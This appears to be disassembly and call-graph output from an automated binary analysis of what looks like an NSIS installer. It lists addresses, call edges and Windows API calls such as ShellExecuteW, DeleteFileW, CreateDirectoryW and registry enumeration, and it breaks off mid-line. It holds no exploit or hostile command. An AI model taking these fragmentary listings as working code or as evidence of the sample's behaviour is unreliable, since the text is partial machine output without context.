RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3819 406009 lstrcpynW 3620->3819 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3805 405047 OleInitialize 3626->3805 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3965 403c83 3640->3965 3641->3640 3647 405cb5 3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4022 406009 lstrcpynW 3651->4022 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4023 405e50 GetFileAttributesW CreateFileW 3674->4023 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3696 406812 3683->3696 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4026 406009 lstrcpynW 3684->4026 3685->3527 3685->3529 3687 4068d3 GetVersion 3699 4068e0 3687->3699 3688 406a46 lstrlenW 3688->3696 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3699 3693 406952 GetSystemDirectoryW 3693->3699 3694 406965 GetWindowsDirectoryW 3694->3699 3695 406038 5 API calls 3695->3696 3696->3684 3696->3687 3696->3688 3696->3689 3696->3695 4024 405f51 wsprintfW 3696->4024 4025 406009 lstrcpynW 3696->4025 3697 406805 10 API calls 3697->3699 3698 4069df lstrcatW 3698->3696 3699->3692 3699->3693 3699->3694 3699->3696 3699->3697 3699->3698 3700 406999 SHGetSpecialFolderLocation 3699->3700 3700->3699 3701 4069b1 SHGetPathFromIDListW CoTaskMemFree 3700->3701 3701->3699 3703 4062fc 3 API calls 3702->3703 3704 406c6f 3703->3704 3706 406c90 3704->3706 4027 406a99 lstrcpyW 3704->4027 3706->3529 3708 405c7a 3707->3708 3709 405c6e CloseHandle 3707->3709 3708->3529 3709->3708 3711 40139d 80 API calls 3710->3711 3712 401432 3711->3712 3712->3495 3719 406045 3713->3719 3714 4060bb 3715 4060c1 CharPrevW 3714->3715 3717 4060e1 3714->3717 3715->3714 3716 4060ae CharNextW 3716->3714 3716->3719 3717->3549 3718 405d06 CharNextW 3718->3719 3719->3714 3719->3716 3719->3718 3720 40609a CharNextW 3719->3720 3721 4060a9 CharNextW 3719->3721 3720->3719 3721->3716 3723 4037ea CreateDirectoryW 3722->3723 3724 40673f lstrcatW 3722->3724 3725 405e7f 3723->3725 3724->3723 3726 405e8c GetTickCount GetTempFileNameW 3725->3726 3727 405ec2 3726->3727 3728 4037fe 3726->3728 3727->3726 3727->3728 3728->3475 3729->3556 3730->3558 3732 406760 3731->3732 3733 4035f3 3732->3733 3734 406766 CharPrevW 3732->3734 3735 406009 lstrcpynW 3733->3735 3734->3732 3734->3733 3735->3562 3737 403357 3736->3737 3737->3576 3739 4032f3 3738->3739 3740 4032db 3738->3740 3743 403303 GetTickCount 3739->3743 3744 4032fb 3739->3744 3741 4032e4 DestroyWindow 3740->3741 3742 4032eb 3740->3742 3741->3742 3742->3565 3746 403311 CreateDialogParamW ShowWindow 3743->3746 3747 403334 3743->3747 3773 406332 3744->3773 3746->3747 3747->3565 3749->3571 3752 403398 3750->3752 3751 4033c3 3754 403336 ReadFile 3751->3754 3752->3751 3795 403368 SetFilePointer 3752->3795 3755 4033ce 3754->3755 3756 4033e7 GetTickCount 3755->3756 3757 403518 3755->3757 3759 4033d2 3755->3759 3769 4033fa 3756->3769 3758 40351c 3757->3758 3763 403540 3757->3763 3760 403336 ReadFile 3758->3760 3759->3580 3760->3759 3761 403336 ReadFile 3761->3763 3762 403336 ReadFile 3762->3769 3763->3759 3763->3761 3764 40355f WriteFile 3763->3764 3764->3759 3765 403574 3764->3765 3765->3759 3765->3763 3767 40345c GetTickCount 3767->3769 3768 403485 MulDiv wsprintfW 3784 404f72 3768->3784 3769->3759 3769->3762 3769->3767 3769->3768 3771 4034c9 WriteFile 3769->3771 3777 407312 3769->3777 3771->3759 3771->3769 3772->3572 3774 40634f PeekMessageW 3773->3774 3775 406345 DispatchMessageW 3774->3775 3776 403301 3774->3776 3775->3774 3776->3565 3778 407332 3777->3778 3779 40733a 3777->3779 3778->3769 3779->3778 3780 4073c2 GlobalFree 3779->3780 3781 4073cb GlobalAlloc 3779->3781 3782 407443 GlobalAlloc 3779->3782 3783 40743a GlobalFree 3779->3783 3780->3781 3781->3778 3781->3779 3782->3778 3782->3779 3783->3782 3785 404f8b 3784->3785 3794 40502f 3784->3794 3786 404fa9 lstrlenW 3785->3786 3787 406805 18 API calls 3785->3787 3788 404fd2 3786->3788 3789 404fb7 lstrlenW 3786->3789 3787->3786 3791 404fe5 3788->3791 3792 404fd8 SetWindowTextW 3788->3792 3790 404fc9 lstrcatW 3789->3790 3789->3794 3790->3788 3793 404feb SendMessageW SendMessageW SendMessageW 3791->3793 3791->3794 3792->3791 3793->3794 3794->3769 3795->3751 3797 403ea9 3796->3797 3825 405f51 wsprintfW 3797->3825 3799 403f1d 3800 406805 18 API calls 3799->3800 3801 403f29 SetWindowTextW 3800->3801 3803 403f44 3801->3803 3802 403f5f 3802->3595 3803->3802 3804 406805 18 API calls 3803->3804 3804->3803 3826 403daf 3805->3826 3807 40506a 3810 4062a3 11 API calls 3807->3810 3812 405095 3807->3812 3829 40139d 3807->3829 3808 403daf SendMessageW 3809 4050a5 OleUninitialize 3808->3809 3809->3632 3810->3807 3812->3808 3813->3592 3815 405f07 RegQueryValueExW 3814->3815 3816 405989 3814->3816 3817 405f29 RegCloseKey 3815->3817 3816->3590 3816->3591 3817->3816 3819->3597 3964 406009 lstrcpynW 3820->3964 3822 403e88 3823 406722 3 API calls 3822->3823 3824 403e8e lstrcatW 3823->3824 3824->3615 3825->3799 3827 403dc7 3826->3827 3828 403db8 SendMessageW 3826->3828 3827->3807 3828->3827 3832 4013a4 3829->3832 3830 401410 3830->3807 3832->3830 3833 4013dd MulDiv SendMessageW 3832->3833 3834 4015a0 3832->3834 3833->3832 3835 4015fa 3834->3835 3914 40160c 3834->3914 3836 401601 3835->3836 3837 401742 3835->3837 3838 401962 3835->3838 3839 4019ca 3835->3839 3840 40176e 3835->3840 3841 401650 3835->3841 3842 4017b1 3835->3842 3843 401672 3835->3843 3844 401693 3835->3844 3845 401616 3835->3845 3846 4016d6 3835->3846 3847 401736 3835->3847 3848 401897 3835->3848 3849 4018db 3835->3849 3850 40163c 3835->3850 3851 4016bd 3835->3851 3835->3914 3864 4062a3 11 API calls 3836->3864 3856 401751 ShowWindow 3837->3856 3857 401758 3837->3857 3861 40145c 18 API calls 3838->3861 3854 40145c 18 API calls 3839->3854 3858 40145c 18 API calls 3840->3858 3881 4062a3 11 API calls 3841->3881 3947 40145c 3842->3947 3859 40145c 18 API calls 3843->3859 3941 401446 3844->3941 3853 40145c 18 API calls 3845->3853 3870 401446 18 API calls 3846->3870 3846->3914 3847->3914 3963 405f51 wsprintfW 3847->3963 3860 40145c 18 API calls 3848->3860 3865 40145c 18 API calls 3849->3865 3855 401647 PostQuitMessage 3850->3855 3850->3914 3852 4062a3 11 API calls 3851->3852 3867 4016c7 SetForegroundWindow 3852->3867 3868 40161c 3853->3868 3869 4019d1 SearchPathW 3854->3869 3855->3914 3856->3857 3871 401765 ShowWindow 3857->3871 3857->3914 3872 401775 3858->3872 3873 401678 3859->3873 3874 40189d 3860->3874 3875 401968 GetFullPathNameW 3861->3875 3864->3914 3866 4018e2 3865->3866 3878 40145c 18 API calls 3866->3878 3867->3914 3879 4062a3 11 API calls 3868->3879 3869->3914 3870->3914 3871->3914 3882 4062a3 11 API calls 3872->3882 3883 4062a3 11 API calls 3873->3883 3959 4062d5 FindFirstFileW 3874->3959 3885 40197f 3875->3885 3927 4019a1 3875->3927 3877 40169a 3944 4062a3 lstrlenW wvsprintfW 3877->3944 3888 4018eb 3878->3888 3889 401627 3879->3889 3890 401664 3881->3890 3891 401785 SetFileAttributesW 3882->3891 3892 401683 3883->3892 3909 4062d5 2 API calls 3885->3909 3885->3927 3886 4062a3 11 API calls 3894 4017c9 3886->3894 3897 40145c 18 API calls 3888->3897 3898 404f72 25 API calls 3889->3898 3899 40139d 65 API calls 3890->3899 3900 40179a 3891->3900 3891->3914 3907 404f72 25 API calls 3892->3907 3952 405d59 CharNextW CharNextW 3894->3952 3896 4019b8 GetShortPathNameW 3896->3914 3905 4018f5 3897->3905 3898->3914 3899->3914 3906 4062a3 11 API calls 3900->3906 3901 4018c2 3910 4062a3 11 API calls 3901->3910 3902 4018a9 3908 4062a3 11 API calls 3902->3908 3912 4062a3 11 API calls 3905->3912 3906->3914 3907->3914 3908->3914 3913 401991 3909->3913 3910->3914 3911 4017d4 3915 401864 3911->3915 3918 405d06 CharNextW 3911->3918 3936 4062a3 11 API calls 3911->3936 3916 401902 MoveFileW 3912->3916 3913->3927 3962 406009 lstrcpynW 3913->3962 3914->3832 3915->3892 3917 40186e 3915->3917 3919 401912 3916->3919 3920 40191e 3916->3920 3921 404f72 25 API calls 3917->3921 3923 4017e6 CreateDirectoryW 3918->3923 3919->3892 3925 401942 3920->3925 3930 4062d5 2 API calls 3920->3930 3926 401875 3921->3926 3923->3911 3924 4017fe GetLastError 3923->3924 3928 401827 GetFileAttributesW 3924->3928 3929 40180b GetLastError 3924->3929 3935 4062a3 11 API calls 3925->3935 3958 406009 lstrcpynW 3926->3958 3927->3896 3927->3914 3928->3911 3932 4062a3 11 API calls 3929->3932 3933 401929 3930->3933 3932->3911 3933->3925 3938 406c68 42 API calls 3933->3938 3934 401882 SetCurrentDirectoryW 3934->3914 3937 40195c 3935->3937 3936->3911 3937->3914 3939 401936 3938->3939 3940 404f72 25 API calls 3939->3940 3940->3925 3942 406805 18 API calls 3941->3942 3943 401455 3942->3943 3943->3877 3945 4060e7 9 API calls 3944->3945 3946 4016a7 Sleep 3945->3946 3946->3914 3948 406805 18 API calls 3947->3948 3949 401488 3948->3949 3950 401497 3949->3950 3951 406038 5 API calls 3949->3951 3950->3886 3951->3950 3953 405d76 3952->3953 3954 405d88 3952->3954 3953->3954 3955 405d83 CharNextW 3953->3955 3956 405dac 3954->3956 3957 405d06 CharNextW 3954->3957 3955->3956 3956->3911 3957->3954 3958->3934 3960 4018a5 3959->3960 3961 4062eb FindClose 3959->3961 3960->3901 3960->3902 3961->3960 3962->3927 3963->3914 3964->3822 3966 403c91 3965->3966 3967 403876 3966->3967 3968 403c96 FreeLibrary GlobalFree 3966->3968 3969 406c9b 3967->3969 3968->3967 3968->3968 3970 40677e 18 API calls 3969->3970 3971 406cae 3970->3971 3972 406cb7 DeleteFileW 3971->3972 3973 406cce 3971->3973 4013 403882 CoUninitialize 3972->4013 3974 406e4b 3973->3974 4017 406009 lstrcpynW 3973->4017 3980 4062d5 2 API calls 3974->3980 4002 406e58 3974->4002 3974->4013 3976 406cf9 3977 406d03 lstrcatW 3976->3977 3978 406d0d 3976->3978 3979 406d13 3977->3979 3981 406751 2 API calls 3978->3981 3983 406d23 lstrcatW 3979->3983 3984 406d19 3979->3984 3982 406e64 3980->3982 3981->3979 3987 406722 3 API calls 3982->3987 3982->4013 3986 406d2b lstrlenW FindFirstFileW 3983->3986 3984->3983 3984->3986 3985 4062a3 11 API calls 3985->4013 3988 406e3b 3986->3988 3992 406d52 3986->3992 3989 406e6e 3987->3989 3988->3974 3991 4062a3 11 API calls 3989->3991 3990 405d06 CharNextW 3990->3992 3993 406e79 3991->3993 3992->3990 3996 406e18 FindNextFileW 3992->3996 4005 406c9b 72 API calls 3992->4005 4012 404f72 25 API calls 3992->4012 4014 4062a3 11 API calls 3992->4014 4015 404f72 25 API calls 3992->4015 4016 406c68 42 API calls 3992->4016 4018 406009 lstrcpynW 3992->4018 4019 405e30 GetFileAttributesW 3992->4019 3994 405e30 2 API calls 3993->3994 3995 406e81 RemoveDirectoryW 3994->3995 3999 406ec4 3995->3999 4000 406e8d 3995->4000 3996->3992 3998 406e30 FindClose 3996->3998 3998->3988 4001 404f72 25 API calls 3999->4001 4000->4002 4003 406e93 4000->4003 4001->4013 4002->3985 4004 4062a3 11 API calls 4003->4004 4006 406e9d 4004->4006 4005->3992 4008 404f72 25 API calls 4006->4008 4010 406ea7 4008->4010 4011 406c68 42 API calls 4010->4011 4011->4013 4012->3996 4013->3491 4013->3492 4014->3992 4015->3992 4016->3992 4017->3976 4018->3992 4020 405e4d DeleteFileW 4019->4020 4021 405e3f SetFileAttributesW 4019->4021 4020->3992 4021->4020 4022->3653 4023->3677 4024->3696 4025->3696 4026->3685 4028 406ae7 GetShortPathNameW 4027->4028 4029 406abe 4027->4029 4030 406b00 4028->4030 4031 406c62 4028->4031 4053 405e50 GetFileAttributesW CreateFileW 4029->4053 4030->4031 4033 406b08 WideCharToMultiByte 4030->4033 4031->3706 4033->4031 4035 406b25 WideCharToMultiByte 4033->4035 4034 406ac7 CloseHandle GetShortPathNameW 4034->4031 4036 406adf 4034->4036 4035->4031 4037 406b3d wsprintfA 4035->4037 4036->4028 4036->4031 4038 406805 18 API calls 4037->4038 4039 406b69 4038->4039 4054 405e50 GetFileAttributesW CreateFileW 4039->4054 4041 406b76 4041->4031 4042 406b83 GetFileSize GlobalAlloc 4041->4042 4043 406ba4 ReadFile 4042->4043 4044 406c58 CloseHandle 4042->4044 4043->4044 4045 406bbe 4043->4045 4044->4031 4045->4044 4055 405db6 lstrlenA 4045->4055 4048 406bd7 lstrcpyA 4051 406bf9 4048->4051 4049 406beb 4050 405db6 4 API calls 4049->4050 4050->4051 4052 406c30 SetFilePointer WriteFile GlobalFree 4051->4052 4052->4044 4053->4034 4054->4041 4056 405df7 lstrlenA 4055->4056 4057 405dd0 lstrcmpiA 4056->4057 4058 405dff 4056->4058 4057->4058 4059 405dee CharNextA 4057->4059 4058->4048 4058->4049 4059->4056 4940 402a84 4941 401553 19 API calls 4940->4941 4942 402a8e 4941->4942 4943 401446 18 API calls 4942->4943 4944 402a98 4943->4944 4945 401a13 4944->4945 4946 402ab2 RegEnumKeyW 4944->4946 4947 402abe RegEnumValueW 4944->4947 4948 402a7e 4946->4948 4947->4945 4947->4948 4948->4945 4949 4029e4 RegCloseKey 4948->4949 4949->4945 4950 402c8a 4951 402ca2 4950->4951 4952 402c8f 4950->4952 4954 40145c 18 API calls 4951->4954 4953 401446 18 API calls 4952->4953 4956 402c97 4953->4956 4955 402ca9 lstrlenW 4954->4955 4955->4956 4957 402ccb WriteFile 4956->4957 4958 401a13 4956->4958 4957->4958 4959 40400d 4960 40406a 4959->4960 4961 40401a lstrcpynA lstrlenA 4959->4961 4961->4960 4962 40404b 4961->4962 4962->4960 4963 404057 GlobalFree 4962->4963 4963->4960 4964 401d8e 4965 40145c 18 API calls 4964->4965 4966 401d95 ExpandEnvironmentStringsW 4965->4966 4967 401da8 4966->4967 4969 401db9 4966->4969 4968 401dad lstrcmpW 4967->4968 4967->4969 4968->4969 4970 401e0f 4971 401446 18 API calls 4970->4971 4972 401e17 4971->4972 4973 401446 18 API calls 4972->4973 4974 401e21 4973->4974 4975 4030e3 4974->4975 4977 405f51 wsprintfW 4974->4977 4977->4975 4978 402392 4979 40145c 18 API calls 4978->4979 4980 402399 4979->4980 4983 4071f8 4980->4983 4984 406ed2 25 API calls 4983->4984 4985 407218 4984->4985 4986 407222 lstrcpynW lstrcmpW 4985->4986 4987 4023a7 4985->4987 4988 407254 4986->4988 4989 40725a lstrcpynW 4986->4989 4988->4989 4989->4987 4060 402713 4075 406009 lstrcpynW 4060->4075 4062 40272c 4076 406009 lstrcpynW 4062->4076 4064 402738 4065 40145c 18 API calls 4064->4065 4067 402743 4064->4067 4065->4067 4066 402752 4069 40145c 18 API calls 4066->4069 4071 402761 4066->4071 4067->4066 4068 40145c 18 API calls 4067->4068 4068->4066 4069->4071 4070 40145c 18 API calls 4072 40276b 4070->4072 4071->4070 4073 4062a3 11 API calls 4072->4073 4074 40277f WritePrivateProfileStringW 4073->4074 4075->4062 4076->4064 4990 402797 4991 40145c 18 API calls 4990->4991 4992 4027ae 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027b7 4993->4994 4995 40145c 18 API calls 4994->4995 4996 4027c0 GetPrivateProfileStringW lstrcmpW 4995->4996 4997 402e18 4998 40145c 18 API calls 4997->4998 4999 402e1f FindFirstFileW 4998->4999 5000 402e32 4999->5000 5005 405f51 wsprintfW 5000->5005 5002 402e43 5006 406009 lstrcpynW 5002->5006 5004 402e50 5005->5002 5006->5004 5007 401e9a 5008 40145c 18 API calls 5007->5008 5009 401ea1 5008->5009 5010 401446 18 API calls 5009->5010 5011 401eab wsprintfW 5010->5011 4287 401a1f 4288 40145c 18 API calls 4287->4288 4289 401a26 4288->4289 4290 4062a3 11 API calls 4289->4290 4291 401a49 4290->4291 4292 401a64 4291->4292 4293 401a5c 4291->4293 4341 406009 lstrcpynW 4292->4341 4340 406009 lstrcpynW 4293->4340 4296 401a62 4300 406038 5 API calls 4296->4300 4297 401a6f 4298 406722 3 API calls 4297->4298 4299 401a75 lstrcatW 4298->4299 4299->4296 4302 401a81 4300->4302 4301 4062d5 2 API calls 4301->4302 4302->4301 4303 405e30 2 API calls 4302->4303 4305 401a98 CompareFileTime 4302->4305 4306 401ba9 4302->4306 4310 4062a3 11 API calls 4302->4310 4314 406009 lstrcpynW 4302->4314 4320 406805 18 API calls 4302->4320 4327 405ca0 MessageBoxIndirectW 4302->4327 4331 401b50 4302->4331 4338 401b5d 4302->4338 4339 405e50 GetFileAttributesW CreateFileW 4302->4339 4303->4302 4305->4302 4307 404f72 25 API calls 4306->4307 4309 401bb3 4307->4309 4308 404f72 25 API calls 4311 401b70 4308->4311 4312 40337f 37 API calls 4309->4312 4310->4302 4315 4062a3 11 API calls 4311->4315 4313 401bc6 4312->4313 4316 4062a3 11 API calls 4313->4316 4314->4302 4322 401b8b 4315->4322 4317 401bda 4316->4317 4318 401be9 SetFileTime 4317->4318 4319 401bf8 CloseHandle 4317->4319 4318->4319 4321 401c09 4319->4321 4319->4322 4320->4302 4323 401c21 4321->4323 4324 401c0e 4321->4324 4326 406805 18 API calls 4323->4326 4325 406805 18 API calls 4324->4325 4328 401c16 lstrcatW 4325->4328 4329 401c29 4326->4329 4327->4302 4328->4329 4330 4062a3 11 API calls 4329->4330 4332 401c34 4330->4332 4333 401b93 4331->4333 4334 401b53 4331->4334 4335 405ca0 MessageBoxIndirectW 4332->4335 4336 4062a3 11 API calls 4333->4336 4337 4062a3 11 API calls 4334->4337 4335->4322 4336->4322 4337->4338 4338->4308 4339->4302 4340->4296 4341->4297 5012 40209f GetDlgItem GetClientRect 5013 40145c 18 API calls 5012->5013 5014 4020cf LoadImageW SendMessageW 5013->5014 5015 4030e3 5014->5015 5016 4020ed DeleteObject 5014->5016 5016->5015 5017 402b9f 5018 401446 18 API calls 5017->5018 5023 402ba7 5018->5023 5019 402c4a 5020 402bdf ReadFile 5022 402c3d 5020->5022 5020->5023 5021 401446 18 API calls 5021->5022 5022->5019 5022->5021 5029 402d17 ReadFile 5022->5029 5023->5019 5023->5020 5023->5022 5024 402c06 MultiByteToWideChar 5023->5024 5025 402c3f 5023->5025 5027 402c4f 5023->5027 5024->5023 5024->5027 5030 405f51 wsprintfW 5025->5030 5027->5022 5028 402c6b SetFilePointer 5027->5028 5028->5022 5029->5022 5030->5019 5031 402b23 GlobalAlloc 5032 402b39 5031->5032 5033 402b4b 5031->5033 5034 401446 18 API calls 5032->5034 5035 40145c 18 API calls 5033->5035 5036 402b41 5034->5036 5037 402b52 WideCharToMultiByte lstrlenA 5035->5037 5038 402b93 5036->5038 5039 402b84 WriteFile 5036->5039 5037->5036 5039->5038 5040 402384 GlobalFree 5039->5040 5040->5038 5042 4044a5 5043 404512 5042->5043 5044 4044df 5042->5044 5046 40451f GetDlgItem GetAsyncKeyState 5043->5046 5053 4045b1 5043->5053 5110 405c84 GetDlgItemTextW 5044->5110 5049 40453e GetDlgItem 5046->5049 5056 40455c 5046->5056 5047 4044ea 5050 406038 5 API calls 5047->5050 5048 40469d 5108 404833 5048->5108 5112 405c84 GetDlgItemTextW 5048->5112 5051 403d3f 19 API calls 5049->5051 5052 4044f0 5050->5052 5055 404551 ShowWindow 5051->5055 5058 403e74 5 API calls 5052->5058 5053->5048 5059 406805 18 API calls 5053->5059 5053->5108 5055->5056 5061 404579 SetWindowTextW 5056->5061 5066 405d59 4 API calls 5056->5066 5057 403dca 8 API calls 5062 404847 5057->5062 5063 4044f5 GetDlgItem 5058->5063 5064 40462f SHBrowseForFolderW 5059->5064 5060 4046c9 5065 40677e 18 API calls 5060->5065 5067 403d3f 19 API calls 5061->5067 5068 404503 IsDlgButtonChecked 5063->5068 5063->5108 5064->5048 5069 404647 CoTaskMemFree 5064->5069 5070 4046cf 5065->5070 5071 40456f 5066->5071 5072 404597 5067->5072 5068->5043 5073 406722 3 API calls 5069->5073 5113 406009 lstrcpynW 5070->5113 5071->5061 5077 406722 3 API calls 5071->5077 5074 403d3f 19 API calls 5072->5074 5075 404654 5073->5075 5078 4045a2 5074->5078 5079 40468b SetDlgItemTextW 5075->5079 5084 406805 18 API calls 5075->5084 5077->5061 5111 403d98 SendMessageW 5078->5111 5079->5048 5080 4046e6 5082 4062fc 3 API calls 5080->5082 5091 4046ee 5082->5091 5083 4045aa 5087 4062fc 3 API calls 5083->5087 5085 404673 lstrcmpiW 5084->5085 5085->5079 5088 404684 lstrcatW 5085->5088 5086 404730 5114 406009 lstrcpynW 5086->5114 5087->5053 5088->5079 5090 404739 5092 405d59 4 API calls 5090->5092 5091->5086 5096 406751 2 API calls 5091->5096 5097 404785 5091->5097 5093 40473f GetDiskFreeSpaceW 5092->5093 5095 404763 MulDiv 5093->5095 5093->5097 5095->5097 5096->5091 5099 4047e2 5097->5099 5100 4043ad 21 API calls 5097->5100 5098 404805 5115 403d85 KiUserCallbackDispatcher 5098->5115 5099->5098 5101 40141d 80 API calls 5099->5101 5102 4047d3 5100->5102 5101->5098 5104 4047e4 SetDlgItemTextW 5102->5104 5105 4047d8 5102->5105 5104->5099 5106 4043ad 21 API calls 5105->5106 5106->5099 5107 404821 5107->5108 5116 403d61 5107->5116 5108->5057 5110->5047 5111->5083 5112->5060 5113->5080 5114->5090 5115->5107 5117 403d74 SendMessageW 5116->5117 5118 403d6f 5116->5118 5117->5108 5118->5117 5119 402da5 5120 4030e3 5119->5120 5121 402dac 5119->5121 5122 401446 18 API calls 5121->5122 5123 402db8 5122->5123 5124 402dbf SetFilePointer 5123->5124 5124->5120 5125 402dcf 5124->5125 5125->5120 5127 405f51 wsprintfW 5125->5127 5127->5120 5128 4030a9 SendMessageW 5129 4030c2 InvalidateRect 5128->5129 5130 4030e3 5128->5130 5129->5130 5131 401cb2 5132 40145c 18 API calls 5131->5132 5133 401c54 5132->5133 5134 4062a3 11 API calls 5133->5134 5137 401c64 5133->5137 5135 401c59 5134->5135 5136 406c9b 81 API calls 5135->5136 5136->5137 4087 4021b5 4088 40145c 18 API calls 4087->4088 4089 4021bb 4088->4089 4090 40145c 18 API calls 4089->4090 4091 4021c4 4090->4091 4092 40145c 18 API calls 4091->4092 4093 4021cd 4092->4093 4094 40145c 18 API calls 4093->4094 4095 4021d6 4094->4095 4096 404f72 25 API calls 4095->4096 4097 4021e2 ShellExecuteW 4096->4097 4098 40221b 4097->4098 4099 40220d 4097->4099 4101 4062a3 11 API calls 4098->4101 4100 4062a3 11 API calls 4099->4100 4100->4098 4102 402230 4101->4102 5145 402238 5146 40145c 18 API calls 5145->5146 5147 40223e 5146->5147 5148 4062a3 11 API calls 5147->5148 5149 40224b 5148->5149 5150 404f72 25 API calls 5149->5150 5151 402255 5150->5151 5152 405c3f 2 API calls 5151->5152 5153 40225b 5152->5153 5154 4062a3 11 API calls 5153->5154 5157 4022ac CloseHandle 5153->5157 5160 40226d 5154->5160 5156 4030e3 5157->5156 5158 402283 WaitForSingleObject 5159 402291 GetExitCodeProcess 5158->5159 5158->5160 5159->5157 5162 4022a3 5159->5162 5160->5157 5160->5158 5161 406332 2 API calls 5160->5161 5161->5158 5164 405f51 wsprintfW 5162->5164 5164->5157 5165 4040b8 5166 4040d3 5165->5166 5174 404201 5165->5174 5170 40410e 5166->5170 5196 403fca WideCharToMultiByte 5166->5196 5167 40426c 5168 404276 GetDlgItem 5167->5168 5169 40433e 5167->5169 5171 404290 5168->5171 5172 4042ff 5168->5172 5175 403dca 8 API calls 5169->5175 5177 403d3f 19 API calls 5170->5177 5171->5172 5180 4042b6 6 API calls 5171->5180 5172->5169 5181 404311 5172->5181 5174->5167 5174->5169 5176 40423b GetDlgItem SendMessageW 5174->5176 5179 404339 5175->5179 5201 403d85 KiUserCallbackDispatcher 5176->5201 5178 40414e 5177->5178 5183 403d3f 19 API calls 5178->5183 5180->5172 5184 404327 5181->5184 5185 404317 SendMessageW 5181->5185 5188 40415b CheckDlgButton 5183->5188 5184->5179 5189 40432d SendMessageW 5184->5189 5185->5184 5186 404267 5187 403d61 SendMessageW 5186->5187 5187->5167 5199 403d85 KiUserCallbackDispatcher 5188->5199 5189->5179 5191 404179 GetDlgItem 5200 403d98 SendMessageW 5191->5200 5193 40418f SendMessageW 5194 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5193->5194 5195 4041ac GetSysColor 5193->5195 5194->5179 5195->5194 5197 404007 5196->5197 5198 403fe9 GlobalAlloc WideCharToMultiByte 5196->5198 5197->5170 5198->5197 5199->5191 5200->5193 5201->5186 4196 401eb9 4197 401f24 4196->4197 4198 401ec6 4196->4198 4199 401f53 GlobalAlloc 4197->4199 4200 401f28 4197->4200 4201 401ed5 4198->4201 4208 401ef7 4198->4208 4202 406805 18 API calls 4199->4202 4207 4062a3 11 API calls 4200->4207 4212 401f36 4200->4212 4203 4062a3 11 API calls 4201->4203 4206 401f46 4202->4206 4204 401ee2 4203->4204 4209 402708 4204->4209 4214 406805 18 API calls 4204->4214 4206->4209 4210 402387 GlobalFree 4206->4210 4207->4212 4218 406009 lstrcpynW 4208->4218 4210->4209 4220 406009 lstrcpynW 4212->4220 4213 401f06 4219 406009 lstrcpynW 4213->4219 4214->4204 4216 401f15 4221 406009 lstrcpynW 4216->4221 4218->4213 4219->4216 4220->4206 4221->4209 5202 4074bb 5204 407344 5202->5204 5203 407c6d 5204->5203 5205 4073c2 GlobalFree 5204->5205 5206 4073cb GlobalAlloc 5204->5206 5207 407443 GlobalAlloc 5204->5207 5208 40743a GlobalFree 5204->5208 5205->5206 5206->5203 5206->5204 5207->5203 5207->5204 5208->5207

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 319 4039f5-403a0d GetTempPathW call 4037cc 317->319 320 403944-40394a 318->320 321 40394c-403950 318->321 328 403a33-403a4d DeleteFileW call 403587 319->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 319->329 320->320 320->321 323 403952-403957 321->323 324 403958-40395c 321->324 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 342 4039c7 326->342 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 CoUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 333 403970-403973 331->333 334 403975 331->334 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 333->332 333->334 334->332 342->316 343->326 361 4039d8-4039f0 call 407d6e call 406009 343->361 348 403997-40399a 344->348 349 40399c 344->349 359 403ae1-403af1 call 405ca0 ExitProcess 345->359 360 403bce-403bd4 345->360 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 358 